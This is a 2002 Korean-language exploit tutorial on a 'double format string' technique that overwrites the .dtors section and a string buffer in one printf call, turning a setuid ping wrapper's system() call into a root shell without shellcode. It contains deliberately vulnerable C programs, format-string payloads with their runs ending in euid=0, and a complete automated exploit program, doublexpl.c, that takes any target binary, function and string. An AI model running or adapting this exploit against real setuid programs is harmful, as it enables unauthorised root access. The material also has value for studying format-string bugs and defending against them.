|=======================================================================================| Title: Double format string Project (Do you need Shellcode?) Author : 유동훈 (Xpl017Elz) in INetCop E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date: 2002/03/17 |=======================================================================================| P.S: 문서의 처음에 PS를 달기는 처음이네요... 참고로, 이 문서는 자세한 내용을 담고있지 않습니다. 이것은 특정조건을 만족했을때만 일어날수 있습니다. 다만 이러한 공격법이 있다라는것만을 증명해줍니다. 회사의 다른 프로젝트 덕분에 문서는 4월에 공개하였습니다. 이것이 그리 대단한 프로젝트는 아닙니다. 하지만 이와 또다른 공격기법도 연구할 가능성?을 줍니다. 단지 눈으로 즐깁시다. ^^ Shellcode 없이 format string 할수 있는 좋은 방법을 아시는분은 저에게 mail 주시기 바랍니다. 그럼, 즐거운 exploit 하십시오. :-) * 목차 없음. |=======================================================================================| 다음은 설명을 위해 간단히 test exploit할 babo? 프로그램이다. [= source: test.c ==========================================================] #include char x0x[100] = "[It's x0x buffer]"; static void funx(void); int main() { char x82[100]; printf("input: "); fgets(x82, 100, stdin); printf("output: "); printf(x82); /* babo, it's bug! */ exit(0); } void funx(void) { printf("x0x buffer message: %s\n", x0x); } [===========================================================================] [root@xpl017elz tmp]# gcc -o test test.c && ./test input: x82 output: x82 [root@xpl017elz tmp]# 컴파일과 함께 실행후 프로그램은 문자열 입력을 요구하였다. "x82"라는 문자열을 입력해본 결과 "x82"라는 출력결과를 얻을수 있다. 다음과 같이 exploit에 필요한 address를 구한다. [root@xpl017elz tmp]# objdump -h test | grep .dtors 18 .dtors 00000008 080495f0 080495f0 000005f0 2**2 [root@xpl017elz tmp]# objdump --syms test | grep funx 080484b4 l F .text 00000017 funx [root@xpl017elz tmp]# 정리하면, test 프로그램의 Overwrite 시킬 .dtors(+4byte) section의 address는 0x080495f4부터 시작한다. 그리고, funx() 함수가 위치하는 address는 0x080484b4이다. ---------------------------------------------------------------------------- (gdb) disass funx Dump of assembler code for function funx: 0x80484b4 : push %ebp 0x80484b5 : mov %esp,%ebp 0x80484b7 : push $0x8049580 0x80484bc : push $0x8048531 0x80484c1 : call 0x8048384 0x80484c6 : add $0x8,%esp 0x80484c9 : leave 0x80484ca : ret 0x80484cb : nop 0x80484cc : nop 0x80484cd : nop 0x80484ce : nop 0x80484cf : nop End of assembler dump. (gdb) x/s 0x8049580 0x8049580 : "[It's x0x buffer]" (gdb) x/s 0x8048531 0x8048531 <_IO_stdin_used+21>: "x0x buffer message: %s\n" (gdb) --------------------------------------------------------------------------- 저장된 문자열은 0x08049580에 존재하고 있음을 알수있다. 시도할 exploit의 목표는 대강 다음과 같다. 0x00. 일반적인 format string bug를 일으켜 함수 funx()를 .dtors section을 덮어씌운다. 0x01. 문자열 "[It's x0x buffer]"를 다른 주소값으로 덮어씌워 원하는 문자열을 출력할수 있도록 test exploit을 시도한다. 0x02. 출력 결과를 즐긴다? 가장 필요한것은 한번에 두 영역의 서로 다른 주소값 덮어쓰기를 성공해야 한다는 점이다. 일명 "Double format string"이라 이름을 지어봤다. 어울리지 않는 이름이라 생각되면 나에게 피드백 바란다. 어쨌든, Double format string을 통해 funx() 함수를 불러온후 문자열의 address를 변경하려면 다음과 같이 exploit 해보기로 한다. --------------------------------------------------------------------------- \x82\x82\x82\x82\xf4\x95\x04\x08 -> .dtors address, \x82\x82\x82\x82\xf6\x95\x04\x08 -> .dtors address, \x82\x82\x82\x82\x80\x95\x04\x08 -> string address, \x82\x82\x82\x82\x82\x95\x04\x08 -> string address, %%33940x%%n%%33616x%%n -> funx() function address, %%14653x%%n%%65536x%%n -> 0x41414141. --------------------------------------------------------------------------- = 결 과: ================================================================= [root@xpl017elz tmp]# (printf "\x82\x82\x82\x82\xf4\x95\x04\x08\x82\x82\x82\x 82\xf6\x95\x04\x08\x82\x82\x82\x82\x80\x95\x04\x08\x82\x82\x82\x82\x82\x95\x 04\x08%%33940x%%n%%33616x%%n%%14653x%%n%%65536x%%n";cat)|./test input: output: 굚굚?굚귯굚굚�굚굚? ~~ 82828282 ~~ 82828282 ~~ .. 중 략 .. 82828282 ~~ 82828282 x0x buffer message: AAAA [root@xpl017elz tmp]# ============================================================================ 문자열 "[It's x0x buffer]"를 "AAAA"로 덮어 씌우는데 성공하였다. format string을 이용하여 원하는 buffer에 임의의 address를 덮을수 있는 가능성을 확인하였다. 하지만, 그 방법이 완벽하지 못하고 덮어쓰지 못하는 영역이 존재하기 때문에 어려움도 있다. 그렇다면, 실제 exploit할 테스트 프로그램을 짜보도록 하겠다. [= source: realping.c =====================================================] #include #include char x0x[100] = "/bin/ping"; int main(int argc, char *argv[]) { int uid = getuid(); char x82[100]; if(argc < 2) { printf("Usage: %s [host ip]\n", argv[0]); exit(-1); } printf("host ip: "); /************** 'Very Easy' format string hole **************/ strncpy(x82, argv[1], 80); strncat(x82, "\n",20); printf(x82); if(uid == 0) { ping(x82); } printf("User is not root (uid 0)\n"); exit(0); } ping(char *ip) { char buf[100]; snprintf(buf,100,"%s %s", x0x, ip); system(buf); exit(0); } [==========================================================================] * 이 멍청한 프로그램은 매우 간단히 짜여졌기 때문에 다수의 버그를 지니고 있다는 사실을 알아두라. 일반 유저가 실행하면, 다음과 같은 실행결과를 출력한다. [x82@xpl017elz tmp]$ ./realping Usage: ./realping [host ip] [x82@xpl017elz tmp]$ ./realping 61.37.177.34 host ip: 61.37.177.34 User is not root (uid 0) [x82@xpl017elz tmp]$ root 유저가 실행하면 다음과 같은 실행결과를 출력한다. [root@xpl017elz tmp]# ./realping 61.37.177.34 host ip: 61.37.177.34 PING 61.37.177.34 (61.37.177.34) from 61.37.177.33 : 56(84) bytes of data. 64 bytes from 61.37.177.34: icmp_seq=0 ttl=255 time=0.3 ms 64 bytes from 61.37.177.34: icmp_seq=1 ttl=255 time=0.1 ms 64 bytes from 61.37.177.34: icmp_seq=2 ttl=255 time=0.1 ms --- 61.37.177.34 ping statistics --- 3 packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.1/0.3 ms [root@xpl017elz tmp]# 프로그램은 "host ip" 출력부분에서 format string bug를 가지고 있다. 이것을 exploit 하기전에 어떤 방식으로 공격할것인지를 생각해보자. - 다음의 code에서 format string을 일으킨다. ------------------------------- ... printf(x82); ... - 그후, uid가 0인지를 check하는 if문이 나온다. ---------------------------- ... if(uid == 0) { ping(x82); } printf("User is not root (uid 0)\n"); exit(1); ... --------------------------------------------------------------------------- 만약 uid가 0이라면 ping() 함수가 수행된다. 그러나 uid가 0이 아니면 에러메세지를 출력후 exit하게 된다. 이에 앞서 먼저 test exploit 해본것을 참고하면, if문을 우회할수 있는 방법이 생긴다. if문을 우회한후에는 일명: "Double format string"을 이용하여 Shellcode 없이도 shell을 띄울수 있을것 같다! :-) 그렇다면, 'Happy Exploit' 해보자. --------------------------------------------------------------------------- [x82@xpl017elz tmp]$ objdump -h realping | grep .dtors 17 .dtors 00000008 08049730 08049730 00000730 2**2 [x82@xpl017elz tmp]$ objdump --syms realping | grep ping 080485b4 g F .text 0000003e ping [x82@xpl017elz tmp]$ gdb -q realping (gdb) disass ping Dump of assembler code for function ping: 0x80485b4 : push %ebp 0x80485b5 : mov %esp,%ebp 0x80485b7 : sub $0x64,%esp 0x80485ba : mov 0x8(%ebp),%eax 0x80485bd : push %eax 0x80485be : push $0x80496c0 0x80485c3 : push $0x804868b 0x80485c8 : push $0x64 0x80485ca : lea 0xffffff9c(%ebp),%eax 0x80485cd : push %eax 0x80485ce : call 0x8048428 0x80485d3 : add $0x14,%esp 0x80485d6 : lea 0xffffff9c(%ebp),%eax 0x80485d9 : push %eax 0x80485da : call 0x80483d8 0x80485df : add $0x4,%esp 0x80485e2 : push $0x0 0x80485e4 : call 0x8048438 0x80485e9 : add $0x4,%esp 0x80485ec : lea 0x0(%esi,1),%esi 0x80485f0 : leave 0x80485f1 : ret ---Type to continue, or q to quit---q Quit (gdb) x/s 0x80496c0 0x80496c0 : "/bin/ping" (gdb) x/s 0x804868b 0x804868b <_IO_stdin_used+63>: "%s %s" (gdb) --------------------------------------------------------------------------- 위와 같이 address를 구했다. 이제 shell을 띄우는 일만 남은것인가? 앞으로의 간단한 계획을 말하자면, 0x00. .dtors section을 ping() 함수의 주소로 덮어씌운다.. 0x01. 그후, x0x 변수에 저장되있는 문자열 "/bin/ping"의 주소값을 구한다. 0x02. 구해진 주소값에 "/bin/sh"를 실행하는 명령으로 덮어씌운다. 0x03. 그 다음에는 아주 이쁘게 뜬 Rootshell을 볼수있을것 같다. exploit은 다음과 같이 되었다. --------------------------------------------------------------------------- \x82\x82\x82\x82\x34\x97\x04\x08 -> .dtors address, \x82\x82\x82\x82\x36\x97\x04\x08 -> .dtors address, \x82\x82\x82\x82\xc0\x96\x04\x08 -> string address, \x82\x82\x82\x82\xc2\x96\x04\x08 -> string address, %%34196x%%n%%33360x%%n -> ping() function address, %%24687x%%n%%38856x%%n -> 0x003b6873. --------------------------------------------------------------------------- = 결 과: ================================================================= [x82@xpl017elz tmp]$ perl -e 'system "./realping","\x82\x82\x82\x82\x34\x 97\x04\x08\x82\x82\x82\x82\x36\x97\x04\x08\x82\x82\x82\x82\xc0\x96\x04\x08\x 82\x82\x82\x82\xc2\x96\x04\x08%34196x%n%33360x%n%24687x%n%38856x%n"' host ip: 굚굚굚굚굚굚굚굚 ~~ 82828282 ~~ 82828282 ~~ .. 중 략 .. 82828282 ~~ ~~ 8282 8282 User is not root (uid 0) bash# id uid=501(x82) gid=501(x82) euid=0(root) groups=501(x82),10(wheel),503(secure) bash# whoami root bash# exit exit sh: 好?@똖@?: command not found [x82@xpl017elz tmp]$ ============================================================================ W0W~! Shellcode 없이도 Rootshell을 획득하였다. 어떻게 이러한 결과가 나오게 되었는지 간단히 분석해보자. - ping() 함수의 내부에는 system() 함수를 사용하고 있다. -------------------- ... ping(char *ip) { char buf[100]; snprintf(buf,100,"%s %s", x0x, ip); system(buf); exit(0); } ... ---------------------------------------------------------------------------- buf 변수에는 x0x 변수의 문자열 내용이 복사되고, 프로그램의 인수로 입력한 ip가 copy된다. 이것을 실행하기 위해 먼저 .dtors를 덮어씌워 ping() 함수를 호출하게 한것이다. 그 다음, x0x 변수의 문자열을 덮어씌운 주소값은 0x003b6873이었다. 이 값은 실제 stack에 저장될때 "sh;" 라는 문자열로 씌워진다. 이미 "/bin/ping" 문자열의 주소 위치를 찾았기 때문에 ping 프로그램 대신 공격자가 원하는 shell "/bin/sh"를 실행할수 있었던것이다. :-D 아주 간단한 원리지만 shellcode를 이용할수 없는 최악의 환경이나 우회기법을 필요로 할때는 단지, 즐겁기 위해 이 방법을 선택할지 모른다. 다음 source code는 shellcode 없이 format string attack을 하는 참고 exploit이다. 위의 realping.c source를 컴파일한후 test 해보기 바란다. 그리 잘 짜여진 source code는 아니지만, 연구해보는것도 좋은 방법일것이라 생각된다. 사용 TEST: [x82@xpl017elz x82]$ ./doublexpl -? Double format string exploit exploit by Xpl017Elz ./doublexpl: 부적절한 옵션 -- ? Usage: ./doublexpl -p [target program] -f [target function] -s [target string] [x82@xpl017elz x82]$ ls -al realping -rwsr-xr-x 1 root root 12697 Apr 11 01:41 realping [x82@xpl017elz x82]$ [x82@xpl017elz x82]$ ./doublexpl Double format string exploit exploit by Xpl017Elz Overwrite .dtors section: 0x8049734 Function "ping()": 0x80485b4 String "/bin/ping": 0x80496c0 host ip: 굚굚굚굚굚굚굚굚 .. 중 략 .. 8282 8282 User is not root (uid 0) bash# [= source: doublexpl.c =====================================================] /* **========================================================================** ** Double format string Project ** ** exploit by "you dong-hun"(Xpl017Elz), . ** My World: http://x82.i21c.net ** ** Special Greets: INetCop team, WOWhacker.org (wowcode team). **========================================================================** */ #include #include #define OBJDUMP "/usr/bin/objdump" #define EGREP "/bin/egrep" #define GREP "/bin/grep" #define AWK "/bin/awk" #define DEFAULT_PROGRAM "./realping" #define DEFAULT_FUNC "ping" #define DEFAULT_STRING "/bin/ping" unsigned long dtorsfind(char *program) { char stexec[1024]; FILE *fp; char find[11]; sprintf(stexec,"%s -h %s | %s .dtors | %s -F\" \" '{print $4}'", OBJDUMP, program, GREP, AWK); fp = (FILE *)popen(stexec, "r"); fgets(find,11,fp); pclose(fp); return(strtol(find, NULL, 16)); } unsigned long funcfind(char *program, char *funx) { char stexec[1024]; FILE *fp; char find[11]; sprintf(stexec,"%s --syms %s | %s 'text.*%s' | %s -F\" \" '{print $1}'", OBJDUMP, program, EGREP, funx, AWK); fp = (FILE *)popen(stexec, "r"); fgets(find,11,fp); pclose(fp); return(strtol(find, NULL, 16)); } unsigned long stringfind(char *program, char *stringx) { char stexec[1024]; FILE *fp; char find[11]; sprintf(stexec,"%s -ds %s | %s %s | %s -F\" \" '{print $1}'", OBJDUMP, program, GREP, stringx, AWK); fp = (FILE *)popen(stexec, "r"); fgets(find,11,fp); pclose(fp); return(strtol(find, NULL, 16)); } int main(int argc, char *argv[]) { extern char *optarg; char dfprgm[100] = DEFAULT_PROGRAM, dffunc[100] = DEFAULT_FUNC, dfstrg[100] = DEFAULT_STRING, atk_buf[1024], check[16]; int num_1, num_2, num_3, num_4, num_5, whilx; unsigned long dtorsection_add, pingfunc_addr, string_add, plustw0_1, plustw0_2; struct stat st0cx; printf("\n Double format string exploit \n\t\t\t exploit by Xpl017Elz\n"); while((whilx = getopt(argc, argv, "p:f:s:")) !=EOF) { switch(whilx) { case 'p': bzero(&dfprgm, 100); strncpy(dfprgm, optarg, 100); break; case 'f': bzero(&dffunc, 100); strncpy(dffunc, optarg, 100); break; case 's': bzero(&dfstrg, 100); strncpy(dfstrg, optarg, 100); break; case '?': usage(argv[0]); }} if(stat(dfprgm, &st0cx) < 0) { printf("\n target program not found\n"); usage(argv[0]); } dtorsection_add = dtorsfind(dfprgm) + 0x00000004; plustw0_1 = dtorsection_add + 0x00000002; pingfunc_addr = funcfind(dfprgm, dffunc); string_add = stringfind(dfprgm, dfstrg); plustw0_2 = string_add + 0x00000002; printf("\n Overwrite .dtors section: %p Function \"%s()\": %p String \"%s\": %p\n\n", dtorsection_add, dffunc, pingfunc_addr, dfstrg, string_add); num_1 = (pingfunc_addr >> 16) & 0xffff; num_2 = (pingfunc_addr >> 0) & 0xffff; num_3 = (0x003b6873 >> 16) & 0xffff; /* sh; */ num_4 = (0x003b6873 >> 0) & 0xffff; /* sh; */ for(num_5 = 0; num_5 < 16; num_5++) { check[num_5] = 0x00000082; /* x82 ^--^ */ } sprintf(atk_buf, "%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%%%ux%%n%%%ux%%n%%%ux%%n%%%ux%%n", check[0], check[1], check[2], check[3], (dtorsection_add >> 0) & 0xff, (dtorsection_add >> 8) & 0xff, (dtorsection_add >> 16) & 0xff, (dtorsection_add >> 24) & 0xff, check[4], check[5], check[6], check[7], (plustw0_1 >> 0) & 0xff, (plustw0_1 >> 8) & 0xff, (plustw0_1 >> 16) & 0xff, (plustw0_1 >> 24) & 0xff, check[8], check[9], check[10], check[11], (string_add >> 0) & 0xff, (string_add >> 8) & 0xff, (string_add >> 16) & 0xff, (string_add >> 24) & 0xff, check[12], check[13], check[14], check[15], (plustw0_2 >> 0) & 0xff, (plustw0_2 >> 8) & 0xff, (plustw0_2 >> 16) & 0xff, (plustw0_2 >> 24) & 0xff, num_2 - 32, 0x10000 + num_1 - num_2, num_4 - num_1, 0x10000 + num_3 - num_4); execl(dfprgm, dfprgm, atk_buf, NULL); } int usage(char *args) { printf("\n Usage: %s -p [target program] -f [target function] -s [target string]\n\n", args); exit(0); } [===========================================================================] Reference: The OMEGA project by lamagra Comment - 그의 글은 나에게 ... 굳이 Shellcode를 사용하지 않고 Shell을 띄울수 있는 방법을 생각할수 있는 하나의 계기를 만들어 주었다.